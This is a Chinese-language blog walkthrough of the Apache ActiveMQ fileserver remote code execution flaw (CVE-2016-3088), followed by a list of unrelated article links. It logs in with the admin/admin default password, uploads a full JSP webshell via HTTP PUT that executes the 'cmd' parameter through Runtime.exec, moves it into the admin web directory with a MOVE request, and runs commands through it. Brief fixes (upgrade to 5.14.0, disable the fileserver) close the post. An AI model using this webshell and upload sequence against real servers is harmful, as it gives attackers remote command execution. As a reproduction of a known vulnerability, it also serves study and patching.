Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)案例分析
2024-10-13 08:47:21
部署ActiveMQ运行环境
在linux上部署apache-activemq-5.10.0-bin.tar.gz
通过tar -zxvf apache-activemq-5.10.0-bin.tar.gz解压mq
由于是弱密码,所以可以直接密码登录admin/admin
注意:
如果是密码错误或者不输入密码,则显示如下
输入正确的密码后,通过BurpSuite抓包如下
抓包如下:
改成PUT方法:
此时,htxk.jsp内容为空
重新生成htxk.jsp,文件内容为jsp一句话木马
<%@ page import="java.io.*"%>
<%
out.print("Hello</br>");
String strcmd = request.getParameter("cmd");
String line =null;
Process p=Runtime.getRuntime().exec(strcmd);
InputStream is = p.getInputStream();
BufferedReader br = new BufferedReader(new InputStreamReader(is));
while((line =br.readLine())!=null){
out.print(line+"<br>");
}
%>
查看是否可以执行
可惜没有权限执行
爆出mq的绝对路径
然后利用 MOVE 方法将 Webshell 移入 admin/ 目录(也可以利用相对路径)
MOVE /fileserver/htxk.jsp HTTP/1.1
Destination: file:///home/local/apache-activemq-5.10.0/webapps/admin/htxk.jsp
Host: 192.168.10.106:8161
访问http://192.168.10.106:8161/admin/htxk.jsp?cmd=ls ,命令成功执行,效果如下
解决方法:
5. 漏洞防护方案
1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。
2、通过移除 conf\jetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能
修复成功
存在漏洞的配置:
https://paper.seebug.org/346/
https://www.seebug.org/vuldb/ssvid-96268
最新文章
- Yii2 基于RESTful架构的 advanced版API接口开发 配置、实现、测试 (转)
- ASP.NET Core的配置(4):多样性的配置来源[中篇]
- 初始Java DVD项目
- toad的基本操作
- libreoffice安装
- (转)linux内核虚拟文件系统浅析
- jmeter随笔(7)--查看请求响应,为空
- Java虚拟机学习 - 体系结构 内存模型
- 宣布发布 Windows Azure SDK 2.2,正式发布 Windows Azure Backup 和 Hyper-V 恢复管理器预览版
- Aptana Studio 3 官方汉化包汉化
- 左右 Java 于 finally 深度分析语句块
- Android下资源使用的方式-android学习之旅(五十三)
- 字符串正则匹配(递归/DP)
- Navicat Premium for Mac完美破解
- .NET Core通过过滤器和中间件两种方式实现全局异常捕获和日志记录
- inconfont的使用
- angular4中引入quill editor
- SQL 2016 正式版 安装过程
- table默认的box-sizing在不同浏览器不同
- JAVA求解全排列